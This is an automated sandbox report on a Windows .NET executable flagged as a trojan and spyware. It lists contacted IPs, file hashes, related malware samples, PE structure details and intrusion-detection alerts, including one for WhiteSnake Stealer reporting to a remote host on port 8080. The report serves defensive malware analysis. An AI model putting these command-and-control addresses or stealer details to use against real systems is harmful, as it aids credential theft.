65.21.49.163	unknown	United States	199592	CP-ASDE	true
192.0.78.152	cyble.com	United States	2635	AUTOMATTICUS	false
185.189.159.121	unknown	France	39104	OXEVAFR	true
208.95.112.1	ip-api.com	United States	53334	TUT-ASUS	false
167.86.115.218	unknown	Germany	51167	CONTABODE	true
89.46.80.136	unknown	Sweden	42695	CNHABSE	false
104.26.6.177	blog.cyble.com	United States	13335	CLOUDFLARENETUS	false
140.238.218.94	unknown	United States	31898	ORACLE-BMC-31898US	true
66.33.60.67	cyware.com	Canada	13768	COGECO-PEER1CA	false
168.119.121.16	unknown	Germany	24940	HETZNER-ASDE	true
51.77.125.62	unknown	France	16276	OVHFR	true
46.235.26.83	unknown	Germany	33984	SURFPLANET-ASDE	true
46.226.106.173	unknown	France	203476	GANDI-AS-2Domainnameregistrar-httpwwwgandinetFR	true

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1566277
Start date and time:	2024-12-01 22:50:58 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 49s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowsinteractivecookbook.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	17
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	tDLozbx48F.exe renamed because original name is a hash value
Original Sample Name:	f7b02278a2310a2657dcca702188af461ce8450dc0c5bced802773ca8eab6f50.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@13/2@11/20
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: tDLozbx48F.exe

Simulations

Behavior and APIs

Time	Type	Description
16:51:40	API Interceptor	4163870x Sleep call for process: tDLozbx48F.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.244.42.65	http://is.gd/EmlK8C	Get hash	malicious	Unknown	Browse	twitter.com/
	wDeGiI6U9u.exe	Get hash	malicious	Gurcu Stealer	Browse	twitter.com/UVE4rzhe8O?12=1
	https://cutt.us/oPNMU?imp	Get hash	malicious	Unknown	Browse	twitter.com/cuturl
	http://www.secured-mailsharepoint.online/	Get hash	malicious	Unknown	Browse	twitter.com/
104.244.42.129	snake.exe	Get hash	malicious	Gurcu Stealer	Browse	twitter.com/f10RkK61wN?197=0
159.69.63.226	bot_library.exe	Get hash	malicious	Unknown	Browse
	bot_library.exe	Get hash	malicious	Unknown	Browse
	bot_library.exe	Get hash	malicious	Unknown	Browse
	bot_library.exe	Get hash	malicious	Unknown	Browse
	bot_library.exe	Get hash	malicious	Unknown	Browse
	bot_library.exe	Get hash	malicious	Unknown	Browse
	bot_library.exe	Get hash	malicious	Unknown	Browse
	bot_library.exe	Get hash	malicious	Unknown	Browse
	bot_library.exe	Get hash	malicious	Unknown	Browse
	bot_library.exe	Get hash	malicious	Unknown	Browse
45.60.107.106	meeting.exe	Get hash	malicious	Unknown	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
archive-01.torproject.org	bot_library.exe	Get hash	malicious	Unknown	Browse	159.69.63.226
	bot_library.exe	Get hash	malicious	Unknown	Browse	159.69.63.226
	bot_library.exe	Get hash	malicious	Unknown	Browse	159.69.63.226
	bot_library.exe	Get hash	malicious	Unknown	Browse	159.69.63.226
	bot_library.exe	Get hash	malicious	Unknown	Browse	159.69.63.226
	bot_library.exe	Get hash	malicious	Unknown	Browse	159.69.63.226
	bot_library.exe	Get hash	malicious	Unknown	Browse	159.69.63.226
	bot_library.exe	Get hash	malicious	Unknown	Browse	159.69.63.226
	bot_library.exe	Get hash	malicious	Unknown	Browse	159.69.63.226
	bot_library.exe	Get hash	malicious	Unknown	Browse	159.69.63.226
cybereason.com	Tf69031f9d912f35aab68.exe	Get hash	malicious	Gurcu Stealer	Browse	45.60.107.106
cyble.com	Tf69031f9d912f35aab68.exe	Get hash	malicious	Gurcu Stealer	Browse	192.0.78.213
	meeting.exe	Get hash	malicious	Unknown	Browse	192.0.78.213
	purchase_order.hta	Get hash	malicious	Gurcu Stealer	Browse	192.0.78.183
	purchase_order.vbs	Get hash	malicious	Gurcu Stealer	Browse	192.0.78.183
	snake.exe	Get hash	malicious	Gurcu Stealer	Browse	192.0.78.213
twitter.com	file.exe	Get hash	malicious	Credential Flusher	Browse	104.244.42.1
	file.exe	Get hash	malicious	Credential Flusher	Browse	104.244.42.1
	file.exe	Get hash	malicious	Credential Flusher	Browse	104.244.42.65
	file.exe	Get hash	malicious	Credential Flusher	Browse	104.244.42.65
	file.exe	Get hash	malicious	Credential Flusher	Browse	104.244.42.129
	file.exe	Get hash	malicious	Credential Flusher	Browse	104.244.42.65
	file.exe	Get hash	malicious	Credential Flusher	Browse	104.244.42.193
	file.exe	Get hash	malicious	Credential Flusher	Browse	104.244.42.1
	file.exe	Get hash	malicious	Credential Flusher	Browse	104.244.42.1
	file.exe	Get hash	malicious	Credential Flusher	Browse	104.244.42.1

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TWITTERUS	mipsel.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	69.195.170.56
	https://michiganchronicle.com/philanthropy-under-siege-how-the-fight-against-the-fearless-fund-threatens-black-womens-progress-in-detroit/	Get hash	malicious	Unknown	Browse	104.244.42.200
	https://getgreenshot.org	Get hash	malicious	Unknown	Browse	104.244.42.65
	http://workinginpartnership-johnlewis.com/	Get hash	malicious	Unknown	Browse	104.244.42.136
	tmpE43E.htm	Get hash	malicious	Unknown	Browse	104.244.42.195
	AID0109FLT24DO53CD-F.pdf	Get hash	malicious	Unknown	Browse	104.244.42.1
	lw2HMxuVuf.exe	Get hash	malicious	Unknown	Browse	104.244.42.195
	https://www.google.co.ao/url?Obdy=ObM8wNGVUva21gnTm3qS&cgsr=7knoOQwChvIkzgfn0TSm&sa=t&wofc=nQYL5DF797O1da77PTBQ&url=amp%2Fprimer-distrito-amvt.org%2F.r%2FiO8EME-SUREDANNaW50ZXJtb2RhbC5qYXhAc2VhYm9hcmRtYXJpbmUuY29t	Get hash	malicious	Unknown	Browse	104.244.42.3
	https://atpscan.global.hornetsecurity.com/?d=zgarMAzqF8gJdiyz7BRUZX8-Kt1RoHrhrMmKtaU9kW8&f=VhLn9tqiibnSyqWDnEopjApZtye8WgAc5bwx7BMFWiKwqjA1EcPjZyfvoQy11klP&i=&k=QQhP&m=0jL9ajZ_jxYnMJb2yb4luNRYQCXy24RTS6RPwUyZoAcuBVX0kzGA69aOJSo0d2htwIsi238bOVH3h3HqrhJGfzTuFk7GTjJWYsgIrocXphf5x2p4nZ7S2EABjAck31fG&n=TU5FjsulXTMv8aeSlx257utLr9bUpfdm0dDB4GNEHfOuhOvtIOr62mZHw3PXGZeG&r=qntyoaxGftDLRu_wopiK2t_EdeZaeg9mP15ZZI-qDen_3s7cQ10pAlhKQQnYAIUX&s=c4a8f5ec353e41b8b414bdcf47b33dd5d6b52b0394e0e4a09cc54527f49761c3&u=https%3A%2F%2Fthe1oomisagency.com%2Fthyu%2F	Get hash	malicious	Unknown	Browse	104.244.42.195
	http://winningwriters.com	Get hash	malicious	Unknown	Browse	104.244.42.67
INCAPSULAUS	botnet.sh4.elf	Get hash	malicious	Mirai, Moobot	Browse	107.154.123.249
	la.bot.powerpc.elf	Get hash	malicious	Mirai	Browse	107.154.14.225
	sora.mips.elf	Get hash	malicious	Mirai	Browse	192.230.92.249
	mips.elf	Get hash	malicious	Mirai	Browse	107.154.171.162
	Rapport.html	Get hash	malicious	Unknown	Browse	149.126.77.239
	https://estore.winxdvd.com/l.php?link=uh75n2uyaf5b%7C143517067	Get hash	malicious	Unknown	Browse	45.60.14.94
	https://anzsupportus.web.app/#	Get hash	malicious	Unknown	Browse	45.60.124.46
	https://secure.2checkout.com/affiliate.php?ACCOUNT=LANTECHS&AFFILIATE=120043&PATH=https%3A%2F%2Fwww.vetainteriordesign.com	Get hash	malicious	HtmlDropper, HTMLPhisher	Browse	45.60.14.94
	https://app.pandadoc.com/document/v2?token=4f650edf0fbe63c284330a0c3237efbdcb934f50?	Get hash	malicious	Unknown	Browse	45.223.20.103
	https://email.email.pandadoc.net/c/eJxUkMtu2zoQhp9G3NkQZ0SJXHBh4xy1QJrAgdMgyCbgZWgRtkRFou0qT18YaHrZDQbzDb7_99rWaINkPrlzT0N-i15vjtunx_Nc993rcr7cH5Zt3O4TI80bLFGBkBXrNArVmFqSVAGENw14FwCtIRCuVihY1FBCxUvkvMYacM0x2FDzyjloQt34oiqpN_G0Hs3gjU9uPVBmcX7Lk3Fk7Il0ns7ETrrLeZwL3BTQFtCacfyDuNQX0H7qF9BeoMA2pyMNBf5HygF3aEMVlOCukaJBAUII5AqxaSyEiqRyBbZsSDmG6EyOabjVwA1BjRJWQflyVUniK2mNWwWrZOld8KoOLE0HM8SP31Aks8XnL92iWvXuuuHu8WX3umOTns1woNOpqMpzTmM0IdqJbvZsokucf-H2-rw8zN-_3t_9oIeXfrffbPaqYll_BvxrXGUzHeifzXy7uGhg1zQd59E4uj192kkv3bel-_j_kK--n6-b5t39DAAA__9AXKZY	Get hash	malicious	Unknown	Browse	45.223.20.103
HETZNER-ASDE	mipsel.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	188.34.159.154
	x86_64.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	135.181.174.44
	hmips.elf	Get hash	malicious	Mirai	Browse	197.242.86.255
	botnet.m68k.elf	Get hash	malicious	Mirai, Moobot	Browse	136.243.67.23
	la.bot.arm6.elf	Get hash	malicious	Unknown	Browse	136.243.179.73
	la.bot.arm.elf	Get hash	malicious	Unknown	Browse	136.243.181.200
	TikTokDesktop18.exe	Get hash	malicious	Stealc, Vidar	Browse	116.203.12.9
	TTDesktop18.exe	Get hash	malicious	Stealc, Vidar	Browse	116.203.12.9
	TTDesktop18.exe	Get hash	malicious	Stealc, Vidar	Browse	116.203.12.9
	TT18.exe	Get hash	malicious	Stealc, Vidar	Browse	116.203.12.9
TWITTERUS	mipsel.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	69.195.170.56
	https://michiganchronicle.com/philanthropy-under-siege-how-the-fight-against-the-fearless-fund-threatens-black-womens-progress-in-detroit/	Get hash	malicious	Unknown	Browse	104.244.42.200
	https://getgreenshot.org	Get hash	malicious	Unknown	Browse	104.244.42.65
	http://workinginpartnership-johnlewis.com/	Get hash	malicious	Unknown	Browse	104.244.42.136
	tmpE43E.htm	Get hash	malicious	Unknown	Browse	104.244.42.195
	AID0109FLT24DO53CD-F.pdf	Get hash	malicious	Unknown	Browse	104.244.42.1
	lw2HMxuVuf.exe	Get hash	malicious	Unknown	Browse	104.244.42.195
	https://www.google.co.ao/url?Obdy=ObM8wNGVUva21gnTm3qS&cgsr=7knoOQwChvIkzgfn0TSm&sa=t&wofc=nQYL5DF797O1da77PTBQ&url=amp%2Fprimer-distrito-amvt.org%2F.r%2FiO8EME-SUREDANNaW50ZXJtb2RhbC5qYXhAc2VhYm9hcmRtYXJpbmUuY29t	Get hash	malicious	Unknown	Browse	104.244.42.3
	https://atpscan.global.hornetsecurity.com/?d=zgarMAzqF8gJdiyz7BRUZX8-Kt1RoHrhrMmKtaU9kW8&f=VhLn9tqiibnSyqWDnEopjApZtye8WgAc5bwx7BMFWiKwqjA1EcPjZyfvoQy11klP&i=&k=QQhP&m=0jL9ajZ_jxYnMJb2yb4luNRYQCXy24RTS6RPwUyZoAcuBVX0kzGA69aOJSo0d2htwIsi238bOVH3h3HqrhJGfzTuFk7GTjJWYsgIrocXphf5x2p4nZ7S2EABjAck31fG&n=TU5FjsulXTMv8aeSlx257utLr9bUpfdm0dDB4GNEHfOuhOvtIOr62mZHw3PXGZeG&r=qntyoaxGftDLRu_wopiK2t_EdeZaeg9mP15ZZI-qDen_3s7cQ10pAlhKQQnYAIUX&s=c4a8f5ec353e41b8b414bdcf47b33dd5d6b52b0394e0e4a09cc54527f49761c3&u=https%3A%2F%2Fthe1oomisagency.com%2Fthyu%2F	Get hash	malicious	Unknown	Browse	104.244.42.195
	http://winningwriters.com	Get hash	malicious	Unknown	Browse	104.244.42.67

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	sDKRz09zM7.exe	Get hash	malicious	AsyncRAT, XWorm	Browse	104.244.42.65 104.244.42.129 159.69.63.226 192.0.78.152
	5fEYPS3M8Q.exe	Get hash	malicious	XWorm	Browse	104.244.42.65 104.244.42.129 159.69.63.226 192.0.78.152
	1d5sraR1S1.exe	Get hash	malicious	AgentTesla	Browse	104.244.42.65 104.244.42.129 159.69.63.226 192.0.78.152
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.244.42.65 104.244.42.129 159.69.63.226 192.0.78.152
	back.ps1	Get hash	malicious	Unknown	Browse	104.244.42.65 104.244.42.129 159.69.63.226 192.0.78.152
	og.ps1	Get hash	malicious	Unknown	Browse	104.244.42.65 104.244.42.129 159.69.63.226 192.0.78.152
	bold.ps1	Get hash	malicious	Unknown	Browse	104.244.42.65 104.244.42.129 159.69.63.226 192.0.78.152
	ad.ps1	Get hash	malicious	Unknown	Browse	104.244.42.65 104.244.42.129 159.69.63.226 192.0.78.152
	invoice-6483728493.pdf .js	Get hash	malicious	RHADAMANTHYS	Browse	104.244.42.65 104.244.42.129 159.69.63.226 192.0.78.152
	gKWbina3a4.bat	Get hash	malicious	Stealerium	Browse	104.244.42.65 104.244.42.129 159.69.63.226 192.0.78.152

Process:	C:\Users\user\Downloads\ojBXnKSgmZ\tDLozbx48F.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	501760
Entropy (8bit):	6.591092686826001
Encrypted:	false
SSDEEP:	6144:/6ho3IhHN5ya1R64TxT8jWHgf8YJkVHC++VeQPBZnq0LZYSwFxQx9tw39b5wGuJB:irhtHxpmWHgf8Y6/Qp1nLiDKIwf
MD5:	A338043C6B5260DF6B7CE4C4EC3D1B80
SHA1:	087A787A34EE05478BFA07B50FD39C8367B0A157
SHA-256:	F7B02278A2310A2657DCCA702188AF461CE8450DC0C5BCED802773CA8EAB6F50
SHA-512:	C81B2F1AAC6D249D43B485E8E536C22A8F44DA09E31F118F9DDFD0F1EF6D1EBA4B67E96D087B2148F45DC93E0DE5BA0178C422088E110A40544A7B3B2FF4FCCF
Malicious:	true
Yara Hits:	Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe, Author: Joe Security
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 91%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...d.{..........."...0.................. ........@.. ....................................`.................................4...W.......j............................................................................ ............... ..H............text........ ...................... ..`.rsrc...j...........................@..@.reloc..............................@..B................p.......H........j...P......%.......................................................................................................................................".(o.....s..........(.....N..{....r...p(t....~(....o"........~....(Z.........s.........N..{....r...p(t.....~#......#....s'....$....(.....N..{....r.N.p(t....N..{/...r.O.p(t....N..{0...r&O.p(t....&.(o.....".(.....Vs<...(....t.....3....sE....4...N..{8...r.R.p(t....N..{9...r(R.p(t....N..{:...rFR.p(t....*J.(

C:\Users\user\AppData\Local\y5aox5pi99\port.dat

Download File

Process:	C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:GQ:GQ
MD5:	93189DD27C5C3221F5687B74BCBA0AB6
SHA1:	388575F4F1FD75175A8CC0F38B48DE76D29CEC5F
SHA-256:	5FD441082BF6F1AD86DD1360EE9C9579FC8D5A5B5C683FD1548785DDA85E8138
SHA-512:	91369A7EA2F6E89B83C24F3BE5AAD62325AC8B279EE91561C0A489B7D5ADCBEDDDD8B5B33751C1C9AAEE7781BBAC771CE2A6E8482E5D4F83E5236E2E4CE9ADC3
Malicious:	false
Preview:	6965

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	6.591092686826001
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.80% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01%
File name:	tDLozbx48F.exe
File size:	501'760 bytes
MD5:	a338043c6b5260df6b7ce4c4ec3d1b80
SHA1:	087a787a34ee05478bfa07b50fd39c8367b0a157
SHA256:	f7b02278a2310a2657dcca702188af461ce8450dc0c5bced802773ca8eab6f50
SHA512:	c81b2f1aac6d249d43b485e8e536c22a8f44da09e31f118f9ddfd0f1ef6d1eba4b67e96d087b2148f45dc93e0de5ba0178c422088e110a40544a7b3b2ff4fccf
SSDEEP:	6144:/6ho3IhHN5ya1R64TxT8jWHgf8YJkVHC++VeQPBZnq0LZYSwFxQx9tw39b5wGuJB:irhtHxpmWHgf8Y6/Qp1nLiDKIwf
TLSH:	18B45B4C7748FDD0EE3E89F9A5752710933880439205A7063FDE69E76F926406E8E8ED
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...d.{..........."...0.................. ........@.. ....................................`................................

Static PE Info

General

Entrypoint:	0x47bb8e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0xBF7B9D64 [Tue Oct 20 06:51:16 2071 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x7bb34	0x57	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x7c000	0x76a	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x7e000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x79b94	0x79c00	40b56fa7d9871bcdadd8085e748ff252	False	0.5547015368326489	data	6.603613069606966	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x7c000	0x76a	0x800	67f43f9d558fbb3ae58c94dfc7c325f0	False	0.455078125	data	4.0770883982401935	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x7e000	0xc	0x200	709dba5b5e3d792446a23ba012272ac6	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x7c0a0	0x4e0	data			0.4855769230769231
RT_MANIFEST	0x7c580	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-01T22:51:47.068856+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.16	49723	172.217.19.164	80	TCP
2024-12-01T22:51:47.293990+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.16	49724	172.217.19.164	80	TCP
2024-12-01T22:51:47.392343+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.16	49723	172.217.19.164	80	TCP
2024-12-01T22:51:47.392343+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.16	49723	172.217.19.164	80	TCP
2024-12-01T22:51:47.392343+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.16	49723	172.217.19.164	80	TCP
2024-12-01T22:51:47.392343+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.16	49723	172.217.19.164	80	TCP
2024-12-01T22:51:47.392343+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.16	49723	172.217.19.164	80	TCP
2024-12-01T22:51:47.392343+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.16	49723	172.217.19.164	80	TCP
2024-12-01T22:51:47.392343+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.16	49723	172.217.19.164	80	TCP
2024-12-01T22:51:47.532113+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.16	49724	172.217.19.164	80	TCP
2024-12-01T22:51:47.532113+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.16	49724	172.217.19.164	80	TCP
2024-12-01T22:51:47.532113+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.16	49724	172.217.19.164	80	TCP
2024-12-01T22:51:47.532113+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.16	49724	172.217.19.164	80	TCP
2024-12-01T22:51:47.532113+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.16	49724	172.217.19.164	80	TCP
2024-12-01T22:51:47.532113+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.16	49724	172.217.19.164	80	TCP
2024-12-01T22:51:47.532113+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.16	49724	172.217.19.164	80	TCP
2024-12-01T22:51:47.558301+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.16	49723	172.217.19.164	80	TCP
2024-12-01T22:51:48.701238+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.16	49729	172.217.19.164	80	TCP
2024-12-01T22:51:48.701336+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.16	49730	172.217.19.164	80	TCP
2024-12-01T22:51:51.853620+0100	2045868	ET MALWARE [ANY.RUN] WhiteSnake Stealer Reporting Request (Outbound)	1	192.168.2.16	49737	140.238.218.94	8080	TCP
2024-12-01T22:52:05.521020+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.16	49751	172.217.19.164	80	TCP
2024-12-01T22:52:05.641166+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.16	49751	172.217.19.164	80	TCP
2024-12-01T22:52:05.641166+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.16	49751	172.217.19.164	80	TCP
2024-12-01T22:52:05.641166+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.16	49751	172.217.19.164	80	TCP
2024-12-01T22:52:05.641166+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.16	49751	172.217.19.164	80	TCP
2024-12-01T22:52:05.641166+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.16	49751	172.217.19.164	80	TCP
2024-12-01T22:52:05.641166+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.16	49751	172.217.19.164	80	TCP
2024-12-01T22:52:05.641166+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.16	49751	172.217.19.164	80	TCP
2024-12-01T22:52:05.655819+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.16	49752	172.217.19.164	80	TCP
2024-12-01T22:52:05.920072+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.16	49752	172.217.19.164	80	TCP
2024-12-01T22:52:05.920072+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.16	49752	172.217.19.164	80	TCP
2024-12-01T22:52:05.920072+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.16	49752	172.217.19.164	80	TCP
2024-12-01T22:52:05.920072+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.16	49752	172.217.19.164	80	TCP
2024-12-01T22:52:05.920072+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.16	49752	172.217.19.164	80	TCP
2024-12-01T22:52:05.920072+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.16	49752	172.217.19.164	80	TCP
2024-12-01T22:52:05.920072+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.16	49752	172.217.19.164	80	TCP
2024-12-01T22:52:05.925658+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.16	49751	172.217.19.164	80	TCP
2024-12-01T22:52:06.040157+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.16	49752	172.217.19.164	80	TCP
